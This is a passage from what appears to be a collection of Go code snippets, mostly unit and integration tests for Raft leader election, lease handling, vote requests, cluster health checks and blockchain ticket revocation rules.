runtime.Object, err error) {\n\t\t\t\t\tlease := action.(kubetesting.UpdateAction).GetObject().(*coordinationv1.Lease)\n\t\t\t\t\tif len(ptr.Deref(lease.Spec.HolderIdentity, \"\")) == 0 {\n\t\t\t\t\t\trequire.False(t, isLeader.canWrite(), \"client must release in-memory leader status before Kube API call\")\n\t\t\t\t\t}\n\t\t\t\t\treturn true, nil, errors.New(\"cannot renew\")\n\t\t\t\t})\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"renewal fails due to context\",\n\t\t\tf: func(t *testing.T, internalClient *kubefake.Clientset, isLeader *isLeaderTracker, cancel context.CancelFunc) {\n\t\t\t\tt.Cleanup(func() {\n\t\t\t\t\trequire.False(t, isLeader.canWrite(), \"client must release in-memory leader status when context is canceled\")\n\t\t\t\t})\n\t\t\t\tstart := time.Now()\n\t\t\t\tinternalClient.PrependReactor(\"update\", \"*\", func(action kubetesting.Action) (handled bool, ret runtime.Object, err error) {\n\t\t\t\t\t// keep going for a bit\n\t\t\t\t\tif time.Since(start) < 5*time.Second {\n\t\t\t\t\t\treturn false, nil, nil\n\t\t\t\t\t}\n\n\t\t\t\t\tcancel()\n\t\t\t\t\treturn false, nil, nil\n\t\t\t\t})\n\t\t\t},\n\t\t},\n\t}\n\tfor _, tt := range tests {\n\t\ttt := tt\n\t\tt.Run(tt.name, func(t *testing.T) {\n\t\t\tt.Parallel()\n\n\t\t\tinternalClient := kubefake.NewSimpleClientset()\n\t\t\tisLeader := &isLeaderTracker{tracker: &atomic.Bool{}}\n\n\t\t\tleaderElectorCtx, cancel := context.WithCancel(context.Background())\n\n\t\t\ttt.f(t, internalClient, isLeader, cancel)\n\n\t\t\tleaderElectionConfig := newLeaderElectionConfig(\"ns-001\", \"lease-001\", \"foo-001\", internalClient, isLeader)\n\n\t\t\t// make the tests run quicker\n\t\t\tleaderElectionConfig.LeaseDuration = 2 * time.Second\n\t\t\tleaderElectionConfig.RenewDeadline = 1 * time.Second\n\t\t\tleaderElectionConfig.RetryPeriod = 250 * time.Millisecond\n\n\t\t\t// note that this will block until it exits on its own or tt.f calls cancel()\n\t\t\tleaderelection.RunOrDie(leaderElectorCtx, leaderElectionConfig)\n\t\t})\n\t}\n}", "func TestNodeTick(t *testing.T) {\n\tn := newTestNode(1, []uint64{2, 3}, 0)\n\tr := n.raft\n\tgo n.run()\n\telapsed := r.electionElapsed\n\tn.Tick()\n\n\tfor len(n.tickc) != 0 {\n\t\ttime.Sleep(100 * time.Millisecond)\n\t}\n\n\tn.Stop()\n\tif r.electionElapsed != elapsed+1 {\n\t\tt.Errorf(\"elapsed = %d, want %d\", r.electionElapsed, elapsed+1)\n\t}\n}", "func TestAutoRevocations(t *testing.T) {\n\tt.Parallel()\n\n\t// Use a set of test chain parameters which allow for quicker vote\n\t// activation as compared to various existing network params.\n\tparams := quickVoteActivationParams()\n\n\t// Clone the parameters so they can be mutated, find the correct\n\t// deployment for the automatic ticket revocations agenda, and, finally,\n\t// ensure it is always available to vote by removing the time constraints to\n\t// prevent test failures when the real expiration time passes.\n\tconst voteID = chaincfg.VoteIDAutoRevocations\n\tparams = cloneParams(params)\n\tversion, deployment := findDeployment(t, params, voteID)\n\tremoveDeploymentTimeConstraints(deployment)\n\n\t// Shorter versions of useful params for convenience.\n\tcoinbaseMaturity := params.CoinbaseMaturity\n\tstakeValidationHeight := params.StakeValidationHeight\n\truleChangeInterval := int64(params.RuleChangeActivationInterval)\n\n\t// Create a test harness initialized with the genesis block as the tip.\n\tg := newChaingenHarness(t, params)\n\n\t// replaceAutoRevocationsVersions is a munge function which modifies the\n\t// provided block by replacing the block, stake, vote, and revocation\n\t// transaction versions with the versions associated with the automatic\n\t// ticket revocations deployment.\n\treplaceAutoRevocationsVersions := func(b *wire.MsgBlock) {\n\t\tchaingen.ReplaceBlockVersion(int32(version))(b)\n\t\tchaingen.ReplaceStakeVersion(version)(b)\n\t\tchaingen.ReplaceVoteVersions(version)(b)\n\t\tchaingen.ReplaceRevocationVersions(stake.TxVersionAutoRevocations)(b)\n\t}\n\n\t// ---------------------------------------------------------------------\n\t// Generate and accept enough blocks with the appropriate vote bits set to\n\t// reach one block prior to the automatic ticket revocations agenda becoming\n\t// active.\n\t// ---------------------------------------------------------------------\n\n\tg.AdvanceToStakeValidationHeight()\n\tg.AdvanceFromSVHToActiveAgendas(voteID)\n\tactiveAgendaHeight := uint32(stakeValidationHeight + ruleChangeInterval*3 - 1)\n\tg.AssertTipHeight(activeAgendaHeight)\n\n\t// Ensure the automatic ticket revocations agenda is active.\n\ttipHash := &g.chain.BestSnapshot().Hash\n\tgotActive, err := g.chain.IsAutoRevocationsAgendaActive(tipHash)\n\tif err != nil {\n\t\tt.Fatalf(\"error checking auto revocations agenda status: %v\", err)\n\t}\n\tif !gotActive {\n\t\tt.Fatal(\"expected auto revocations agenda to be active\")\n\t}\n\n\t// ---------------------------------------------------------------------\n\t// Generate enough blocks to have a known distance to the first mature\n\t// coinbase outputs for all tests that follow. These blocks continue to\n\t// purchase tickets to avoid running out of votes.\n\t//\n\t// ... -> bsv# -> bbm0 -> bbm1 -> ... -> bbm#\n\t// ---------------------------------------------------------------------\n\n\tfor i := uint16(0); i < coinbaseMaturity; i++ {\n\t\touts := g.OldestCoinbaseOuts()\n\t\tblockName := fmt.Sprintf(\"bbm%d\", i)\n\t\tg.NextBlock(blockName, nil, outs[1:], replaceAutoRevocationsVersions)\n\t\tg.SaveTipCoinbaseOuts()\n\t\tg.AcceptTipBlock()\n\t}\n\tg.AssertTipHeight(activeAgendaHeight + uint32(coinbaseMaturity))\n\n\t// Collect spendable outputs into two different slices. The outs slice is\n\t// intended to be used for regular transactions that spend from the output,\n\t// while the ticketOuts slice is intended to be used for stake ticket\n\t// purchases.\n\tvar outs []*chaingen.SpendableOut\n\tvar ticketOuts [][]chaingen.SpendableOut\n\tfor i := uint16(0); i < coinbaseMaturity; i++ {\n\t\tcoinbaseOuts := g.OldestCoinbaseOuts()\n\t\touts = append(outs, &coinbaseOuts[0])\n\t\tticketOuts = append(ticketOuts, coinbaseOuts[1:])\n\t}\n\n\t// Create a block that misses a vote and does not contain a revocation for\n\t// that missed vote.\n\t//\n\t// ...\n\t// \\-> b1(0)\n\tstartTip := g.TipName()\n\tg.NextBlock(\"b1\", outs[0], ticketOuts[0], g.ReplaceWithNVotes(4),\n\t\treplaceAutoRevocationsVersions)\n\tg.AssertTipNumRevocations(0)\n\tg.RejectTipBlock(ErrNoMissedTicketRevocation)\n\n\t// Create a block that misses a vote and contains a version 1 revocation\n\t// transaction.\n\t//\n\t// ...\n\t// \\-> b2(0)\n\tg.SetTip(startTip)\n\tg.NextBlock(\"b2\", outs[0], ticketOuts[0], g.ReplaceWithNVotes(4),\n\t\tg.CreateRevocationsForMissedTickets(), replaceAutoRevocationsVersions,\n\t\tchaingen.ReplaceRevocationVersions(1))\n\tg.AssertTipNumRevocations(1)\n\tg.RejectTipBlock(ErrInvalidRevocationTxVersion)\n\n\t// Create a block that misses a vote and contains a revocation with a\n\t// non-zero fee.\n\t//\n\t// ...\n\t// \\-> b3(0)\n\tg.SetTip(startTip)\n\tg.NextBlock(\"b3\", outs[0], ticketOuts[0], g.ReplaceWithNVotes(4),\n\t\tg.CreateRevocationsForMissedTickets(), replaceAutoRevocationsVersions,\n\t\tfunc(b *wire.MsgBlock) {\n\t\t\tfor _, stx := range b.STransactions {\n\t\t\t\tif !stake.IsSSRtx(stx) {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\n\t\t\t\t// Decrement the first output value to create a non-zero fee and\n\t\t\t\t// return so that only a single revocation transaction is\n\t\t\t\t// modified.\n\t\t\t\tstx.TxOut[0].Value--\n\t\t\t\treturn\n\t\t\t}\n\t\t})\n\tg.AssertTipNumRevocations(1)\n\t// Note that this will fail with ErrRegTxCreateStakeOut rather than hitting\n\t// the later error case of ErrBadPayeeValue since a revocation with a\n\t// non-zero fee will not be identified as a revocation if the automatic\n\t// ticket revocations agenda is active.\n\tg.RejectTipBlock(ErrRegTxCreateStakeOut)\n\n\t// Create a valid block that misses multiple votes and contains revocation\n\t// transactions for those votes.\n\t//\n\t// ... -> b4(0)\n\tg.SetTip(startTip)\n\tg.NextBlock(\"b4\", outs[0], ticketOuts[0], g.ReplaceWithNVotes(3),\n\t\tg.CreateRevocationsForMissedTickets(), replaceAutoRevocationsVersions)\n\tg.AssertTipNumRevocations(2)\n\tg.AcceptTipBlock()\n\n\t// Create a slice of the ticket hashes that revocations spent in the tip\n\t// block that was just connected.\n\trevocationTicketHashes := make([]chainhash.Hash, 0, params.TicketsPerBlock)\n\tfor _, stx := range g.Tip().STransactions {\n\t\t// Append revocation ticket hashes.\n\t\tif stake.IsSSRtx(stx) {\n\t\t\tticketHash := stx.TxIn[0].PreviousOutPoint.Hash\n\t\t\trevocationTicketHashes = append(revocationTicketHashes, ticketHash)\n\n\t\t\tcontinue\n\t\t}\n\t}\n\n\t// Validate that the revocations are now in the revoked ticket treap in the\n\t// ticket database.\n\ttipHash = &g.chain.BestSnapshot().Hash\n\tblockNode := g.chain.index.LookupNode(tipHash)\n\tstakeNode, err := g.chain.fetchStakeNode(blockNode)\n\tif err != nil {\n\t\tt.Fatalf(\"error fetching stake node: %v\", err)\n\t}\n\tfor _, revocationTicketHash := range revocationTicketHashes {\n\t\tif !stakeNode.ExistsRevokedTicket(revocationTicketHash) {\n\t\t\tt.Fatalf(\"expected ticket %v to exist in the revoked ticket treap\",\n\t\t\t\trevocationTicketHash)\n\t\t}\n\t}\n\n\t// Invalidate the previously connected block so that it is disconnected.\n\tg.InvalidateBlockAndExpectTip(\"b4\", nil, startTip)\n\n\t// Validate that the revocations from the disconnected block are now back in\n\t// the live ticket treap in the ticket database.\n\ttipHash = &g.chain.BestSnapshot().Hash\n\tblockNode = g.chain.index.LookupNode(tipHash)\n\tstakeNode, err = g.chain.fetchStakeNode(blockNode)\n\tif err != nil {\n\t\tt.Fatalf(\"error fetching stake node: %v\", err)\n\t}\n\tfor _, revocationTicketHash := range revocationTicketHashes {\n\t\tif !stakeNode.ExistsLiveTicket(revocationTicketHash) {\n\t\t\tt.Fatalf(\"expected ticket %v to exist in the live ticket treap\",\n\t\t\t\trevocationTicketHash)\n\t\t}\n\t}\n}", "func (s *GrpcServer) NeedLeaderElection() bool {\n\treturn true\n}", "func TestSkipNoMember(t *testing.T) {\n\tcommitteeMock, keys := agreement.MockCommittee(1, false, 2)\n\teb, roundChan := initAgreement(committeeMock)\n\thash, _ := crypto.RandEntropy(32)\n\teb.Publish(string(topics.Agreement), agreement.MockAgreement(hash, 1, 1, keys))\n\n\tselect {\n\tcase <-roundChan:\n\t\tassert.FailNow(t, \"not supposed to get a round update without reaching quorum\")\n\tcase <-time.After(100 * time.Millisecond):\n\t\t// all good\n\t}\n}", "func testNomadCluster(t *testing.T, nodeIpAddress string) {\n\tmaxRetries := 90\n\tsleepBetweenRetries := 10 * time.Second\n\n\tresponse := retry.DoWithRetry(t, \"Check Nomad cluster has expected number of servers and clients\", maxRetries, sleepBetweenRetries, func() (string, error) {\n\t\tclients, err := callNomadApi(t, nodeIpAddress, \"v1/nodes\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tif len(clients) != DEFAULT_NUM_CLIENTS {\n\t\t\treturn \"\", fmt.Errorf(\"Expected the cluster to have %d clients, but found %d\", DEFAULT_NUM_CLIENTS, len(clients))\n\t\t}\n\n\t\tservers, err := callNomadApi(t, nodeIpAddress, \"v1/status/peers\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tif len(servers) != DEFAULT_NUM_SERVERS {\n\t\t\treturn \"\", fmt.Errorf(\"Expected the cluster to have %d servers, but found %d\", DEFAULT_NUM_SERVERS, len(servers))\n\t\t}\n\n\t\treturn fmt.Sprintf(\"Got back expected number of clients (%d) and servers (%d)\", len(clients), len(servers)), nil\n\t})\n\n\tlogger.Logf(t, \"Nomad cluster is properly deployed: %s\", response)\n}", "func (c *testCluster) waitForElection(i int) *EventLeaderElection {\n\tfor {\n\t\te := <-c.events[i].LeaderElection\n\t\tif e == nil {\n\t\t\tpanic(\"got nil LeaderElection event, channel likely closed\")\n\t\t}\n\t\t// Ignore events with NodeID 0; these mark elections that are in progress.\n\t\tif e.ReplicaID != 0 {\n\t\t\treturn e\n\t\t}\n\t}\n}", "func TestRGITBasic_TestDeleteRaftLogWhenNewTermElection(t *testing.T) {\n\n\ttestInitAllDataFolder(\"TestRGIT_TestDeleteRaftLogWhenNewTermElection\")\n\traftGroupNodes := testCreateThreeNodes(t, 20*1024*1024)\n\tdefer func() {\n\t\ttestDestroyRaftGroups(raftGroupNodes)\n\t}()\n\tproposeMessages := testCreateMessages(t, 10)\n\ttestDoProposeDataAndWait(t, raftGroupNodes, proposeMessages)\n\n\t// get leader information\n\tleaderNode := testGetLeaderNode(t, raftGroupNodes)\n\tlastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tlastTerm, err := leaderNode.storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\tfmt.Printf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\n\t// stop 2 raft node\n\traftGroupNodes[0].Stop()\n\traftGroupNodes[1].Stop()\n\n\t// insert wrong message(which will be replace by new leader) into the last node\n\twrongMessages := testCreateMessages(t, 20)\n\twrongEntries := make([]raftpb.Entry, 0)\n\n\tfor i, msg := range wrongMessages {\n\t\tb := make([]byte, 8+len(msg))\n\t\tbinary.BigEndian.PutUint64(b, uint64(i+1))\n\t\tcopy(b[8:], []byte(msg))\n\n\t\tentry := raftpb.Entry{\n\t\t\tTerm: lastTerm,\n\t\t\tIndex: lastIndex + uint64(i+1),\n\t\t\tType: raftpb.EntryNormal,\n\t\t\tData: b,\n\t\t}\n\t\twrongEntries = append(wrongEntries, entry)\n\n\t}\n\traftGroupNodes[2].storage.StoreEntries(wrongEntries)\n\tfmt.Printf(\"save wrong message success, begin index: %d, term: %d\\n\", wrongEntries[0].Index, wrongEntries[0].Term)\n\twrongIndex, err := raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"save wrong message to node[2], last index :%d\", wrongIndex)\n\n\traftGroupNodes[2].Stop()\n\n\t// restart\n\traftGroupNodes[0].Start()\n\traftGroupNodes[1].Start()\n\n\t// wait a new leader\n\ttime.Sleep(5 * time.Second)\n\tleaderNode = testGetLeaderNode(t, raftGroupNodes)\n\tleaderLastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tleaderLastTerm, err := leaderNode.storage.Term(leaderLastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\tfmt.Printf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\n\t// start the last one node\n\traftGroupNodes[2].Start()\n\t// wait leader append entries\n\ttime.Sleep(5 * time.Second)\n\n\t// check the raft log of last node will be replicated by new leader\n\tlastIndex, err = raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tlastTerm, err = raftGroupNodes[2].storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\tfmt.Printf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\n\tif lastIndex != leaderLastIndex {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node index:%d, but the leader:%d\", lastIndex, leaderLastIndex)\n\t}\n\n\tif lastTerm != leaderLastTerm {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node term :%d, but the leader:%d\", lastTerm, leaderLastTerm)\n\t}\n\n}", "func (r *RaftNode) wonElection() bool {\n\treturn haveMajority(r.votes, \"ELECTION\", r.verbose)\n}", "func TestRaftLeaderLeaseLost(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftLeaderLeaseLost\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn1 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tcfg = getTestConfig(ID2, clusterPrefix+ID2)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn2 := testCreateRaftNode(cfg, newStorage())\n\n\tconnectAllNodes(n1, n2)\n\tn1.transport = NewMsgDropper(n1.transport, 193, 0)\n\tn2.transport = NewMsgDropper(n2.transport, 42, 0)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t}\n\n\t// Create a network partition between \"1\" and \"2\", so leader will lost its leader lease eventually.\n\tn1.transport.(*msgDropper).Set(ID2, 1)\n\tn2.transport.(*msgDropper).Set(ID1, 1)\n\n\t// The leader will lose its leadership eventually because it can't talk to\n\t// the other node.\n\t<-leader.fsm.(*testFSM).followerCh\n}", "func RunPreferedLeaderElectionInCluster(namespace, ccEndpoint, clusterName string) error {\n\n\terr := GetCruiseControlStatus(namespace, ccEndpoint, clusterName)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\toptions := map[string]string{\n\t\t\"dryrun\": \"false\",\n\t\t\"json\": \"true\",\n\t\t\"goals\": \"PreferredLeaderElectionGoal\",\n\t}\n\n\tdResp, err := postCruiseControl(rebalanceAction, namespace, options, ccEndpoint, clusterName)\n\tif err != nil {\n\t\tlog.Error(err, \"can't rebalance cluster gracefully since post to cruise-control failed\")\n\t\treturn err\n\t}\n\tlog.Info(\"Initiated rebalance in cruise control\")\n\n\tuTaskId := dResp.Header.Get(\"User-Task-Id\")\n\n\terr = checkIfCCTaskFinished(uTaskId, namespace, ccEndpoint, clusterName)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (rf *Raft) electionService() {\n\tfor {\n\t\trf.mu.Lock()\n\t\t// snapshot current state of raft, (state & term)\n\t\tcurrentState := rf.state\n\t\tcurrentTerm := rf.currentTerm\n\t\trf.mu.Unlock()\n\t\tswitch currentState {\n\t\tcase Follower:\n\t\t\t// clear raft state.\n\t\t\tselect {\n\t\t\tcase <-time.After(rf.electionTimeout + time.Duration(rand.Intn(500))):\n\t\t\t\tDPrintf(\"Peer-%d's election is timeout.\", rf.me)\n\t\t\t\trf.mu.Lock()\n\t\t\t\tDPrintf(\"Peer-%d's election hold the lock, now the currtentTerm=%d, rf.currentTerm=%d.\", rf.me, currentTerm, rf.currentTerm)\n\t\t\t\t// we should record the currentTerm for which the timer wait.\n\t\t\t\tif rf.state == Follower && rf.currentTerm == currentTerm {\n\t\t\t\t\trf.transitionState(Timeout)\n\t\t\t\t\tDPrintf(\"Peer-%d LSM has set state to candidate.\", rf.me)\n\t\t\t\t}\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tDPrintf(\"Peer-%d turn state from %v to %v.\", rf.me, currentState, rf.state)\n\t\t\tcase event := <-rf.eventChan:\n\t\t\t\tswitch event {\n\t\t\t\tcase HeartBeat:\n\t\t\t\t\tDPrintf(\"Peer-%d Received heartbeat from leader, reset timer.\", rf.me)\n\t\t\t\tcase NewTerm:\n\t\t\t\t\tif rf.currentTerm == currentTerm {\n\t\t\t\t\t\tDPrintf(\"Peer-%d, waring: it received a NewTerm event, but term is not changed.\", rf.me)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tcase Candidate:\n\t\t\t// start a election.\n\t\t\t// using a thread to do election, and sending message to channel;\n\t\t\t// this can let the heartbeat to break the election progress.\n\t\t\tvoteDoneChan := make(chan bool)\n\t\t\tgo func() {\n\t\t\t\tTPrintf(\"Peer-%d becomes candidate, try to hold the lock.\", rf.me)\n\t\t\t\trf.mu.Lock()\n\t\t\t\tTPrintf(\"Peer-%d becomes candidate, has hold the lock, rf.voteFor=%d.\", rf.me, rf.voteFor)\n\t\t\t\t// check state first, if the state has changed, do not vote.\n\t\t\t\t// then check voteFor, if it has voteFor other peer in this term.\n\t\t\t\ttoVote := rf.state == Candidate && (rf.voteFor == -1 || rf.voteFor == rf.me)\n\t\t\t\tif toVote {\n\t\t\t\t\trf.voteFor = rf.me // should mark its voteFor when it begins to vote.\n\t\t\t\t\tDPrintf(\"Peer-%d set voteFor=%d.\", rf.me, rf.voteFor)\n\t\t\t\t}\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tok := false\n\t\t\t\tif toVote {\n\t\t\t\t\tDPrintf(\"Peer-%d begin to vote.\", rf.me)\n\t\t\t\t\trequest := rf.createVoteRequest()\n\t\t\t\t\t// the process logic for each peer.\n\t\t\t\t\tprocess := func(server int) bool {\n\t\t\t\t\t\treply := new(RequestVoteReply)\n\t\t\t\t\t\trf.sendRequestVote(server, request, reply)\n\t\t\t\t\t\tok := rf.processVoteReply(reply)\n\t\t\t\t\t\treturn ok\n\t\t\t\t\t}\n\t\t\t\t\tok = rf.agreeWithServers(process)\n\t\t\t\t}\n\t\t\t\tvoteDoneChan <- ok\n\t\t\t}()\n\t\t\tselect {\n\t\t\tcase done := <-voteDoneChan:\n\t\t\t\tif done {\n\t\t\t\t\tDPrintf(\"Peer-%d win.\", rf.me)\n\t\t\t\t\t// if voting is success, we set state to leader.\n\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\tif rf.state == Candidate {\n\t\t\t\t\t\trf.transitionState(Win)\n\t\t\t\t\t}\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\tDPrintf(\"Peer-%d becomes the leader.\", rf.me)\n\t\t\t\t} else {\n\t\t\t\t\t// if voting is failed, we reset voteFor to -1, but do not reset state and term.\n\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\tif rf.state == Candidate {\n\t\t\t\t\t\trf.transitionState(Timeout)\n\t\t\t\t\t}\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\tsleep(rand.Intn(500))\n\t\t\t\t}\n\t\t\tcase event := <-rf.eventChan:\n\t\t\t\tswitch event {\n\t\t\t\tcase HeartBeat:\n\t\t\t\t\t// if another is win, we will receive heartbeat, so we shoul\n\t\t\t\t\tDPrintf(\"Peer-%d received heartbeat when voting, turn to follower, reset timer.\", rf.me)\n\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\trf.transitionState(NewLeader)\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\tcase NewTerm:\n\t\t\t\t\tDPrintf(\"Peer-%d received higher term when voting, stop waiting.\", rf.me)\n\t\t\t\t}\n\t\t\t}\n\t\tcase Leader:\n\t\t\t// start to send heartbeat.\n\t\t\tDPrintf(\"Peer-%d try to send heartbeat.\", rf.me)\n\t\t\trf.sendHeartbeat()\n\t\t\ttime.Sleep(rf.heartbeatInterval)\n\t\tcase End:\n\t\t\tDPrintf(\"Peer-%d is stopping.\\n\", rf.me)\n\t\t\treturn\n\t\tdefault:\n\t\t\tDPrintf(\"Do not support state: %v\\n\", currentState)\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tcurrentTerm := rf.currentTerm\n\tif args == nil {\n\t\tDPrintf(\"Peer-%d received a null vote request.\", rf.me)\n\t\treturn\n\t}\n\tcandidateTerm := args.Term\n\tcandidateId := args.Candidate\n\tDPrintf(\"Peer-%d received a vote request %v from peer-%d.\", rf.me, *args, candidateId)\n\tif candidateTerm < currentTerm {\n\t\tDPrintf(\"Peer-%d's term=%d > candidate's term=%d.\\n\", rf.me, currentTerm, candidateTerm)\n\t\treply.Term = currentTerm\n\t\treply.VoteGrant = false\n\t\treturn\n\t} else if candidateTerm == currentTerm {\n\t\tif rf.voteFor != -1 && rf.voteFor != candidateId {\n\t\t\tDPrintf(\"Peer-%d has grant to peer-%d before this request from peer-%d.\", rf.me, rf.voteFor, candidateId)\n\t\t\treply.Term = currentTerm\n\t\t\treply.VoteGrant = false\n\t\t\treturn\n\t\t}\n\t\tDPrintf(\"Peer-%d's term=%d == candidate's term=%d, to check index.\\n\", rf.me, currentTerm, candidateTerm)\n\t} else {\n\t\tDPrintf(\"Peer-%d's term=%d < candidate's term=%d.\\n\", rf.me, currentTerm, candidateTerm)\n\t\t// begin to update status\n\t\trf.currentTerm = candidateTerm // find larger term, up to date\n\t\trf.transitionState(NewTerm) // transition to Follower.\n\t\tgo func() {\n\t\t\trf.eventChan <- NewTerm // tell the electionService to change state.\n\t\t}()\n\t}\n\t// check whose log is up-to-date\n\tcandiLastLogIndex := args.LastLogIndex\n\tcandiLastLogTerm := args.LastLogTerm\n\tlocalLastLogIndex := len(rf.log) - 1\n\tlocalLastLogTerm := -1\n\tif localLastLogIndex >= 0 {\n\t\tlocalLastLogTerm = rf.log[localLastLogIndex].Term\n\t}\n\t// check term first, if term is the same, then check the index.\n\tDPrintf(\"Peer-%d try to check last entry, loacl: index=%d;term=%d, candi: index=%d,term=%d.\", rf.me, localLastLogIndex, localLastLogTerm, candiLastLogIndex, candiLastLogTerm)\n\tif localLastLogTerm > candiLastLogTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGrant = false\n\t\treturn\n\t} else if localLastLogTerm == candiLastLogTerm {\n\t\tif localLastLogIndex > candiLastLogIndex {\n\t\t\treply.Term = rf.currentTerm\n\t\t\treply.VoteGrant = false\n\t\t\treturn\n\t\t}\n\t} else {\n\t}\n\t// heartbeat.\n\tgo func() {\n\t\trf.eventChan <- HeartBeat\n\t}()\n\t// local log are up-to-date, grant\n\t// before grant to candidate, we should reset ourselves state.\n\trf.transitionState(NewLeader)\n\trf.voteFor = candidateId\n\treply.Term = rf.currentTerm\n\treply.VoteGrant = true\n\tDPrintf(\"Peer-%d grant to peer-%d.\", rf.me, candidateId)\n\trf.persist()\n\treturn\n}", "func TestRaft_SlowRecvVote(t *testing.T) {\n\thooks := NewSlowVoter(\"svr_1\", \"svr_4\", \"svr_3\")\n\thooks.mode = SlowRecv\n\tcluster := newRaftCluster(t, testLogWriter, \"svr\", 5, hooks)\n\ts := newApplySource(\"SlowRecvVote\")\n\tac := cluster.ApplyN(t, time.Minute, s, 10000)\n\tcluster.Stop(t, time.Minute)\n\thooks.Report(t)\n\tcluster.VerifyLog(t, ac)\n\tcluster.VerifyFSM(t)\n}", "func TestClusterNodeWithoutData(t *testing.T) {\n\tif testing.Short() {\n\t\tt.Skip(\"skipping cluster test in short mode.\")\n\t}\n\tt.Parallel()\n\n\ttc := newTestCluster(t)\n\tdefer tc.tearDown()\n\n\ttc.addSequinses(3)\n\n\t// By default this is 10 minutes; we're reducing it to confirm that\n\t// nodes are not removing versions that their peers still have.\n\ttc.sequinses[0].config.Test.VersionRemoveTimeout = duration{5 * time.Second}\n\ttc.sequinses[1].config.Test.VersionRemoveTimeout = duration{5 * time.Second}\n\ttc.sequinses[2].config.Test.VersionRemoveTimeout = duration{5 * time.Second}\n\n\t// Because it's behind, it's expected that the first node will flap when it\n\t// proxies requests and gets v2 from peers.\n\t// tc.sequinses[0].expectProgression(down, noVersion, v1, v3)\n\ttc.sequinses[1].expectProgression(down, noVersion, v1, v2, v3)\n\ttc.sequinses[2].expectProgression(down, noVersion, v1, v2, v3)\n\n\ttc.makeVersionAvailable(v1)\n\ttc.setup()\n\ttc.startTest()\n\n\ttime.Sleep(expectTimeout)\n\ttc.sequinses[1].makeVersionAvailable(v2)\n\ttc.sequinses[2].makeVersionAvailable(v2)\n\ttc.hup()\n\n\ttime.Sleep(expectTimeout)\n\ttc.makeVersionAvailable(v3)\n\ttc.hup()\n\n\ttc.assertProgression()\n}", "func TestFollowerVote(t *testing.T) {\n\ttests := []struct {\n\t\tvote uint64\n\t\tnvote uint64\n\t\twreject bool\n\t}{\n\t\t{None, 1, false},\n\t\t{None, 2, false},\n\t\t{1, 1, false},\n\t\t{2, 2, false},\n\t\t{1, 2, true},\n\t\t{2, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Term: 1, Vote: tt.vote})\n\n\t\tr.Step(pb.Message{From: tt.nvote, FromGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTerm: 1, Type: pb.MsgVote})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: tt.nvote, ToGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\t\tTerm: 1, Type: pb.MsgVoteResp, Reject: tt.wreject},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = 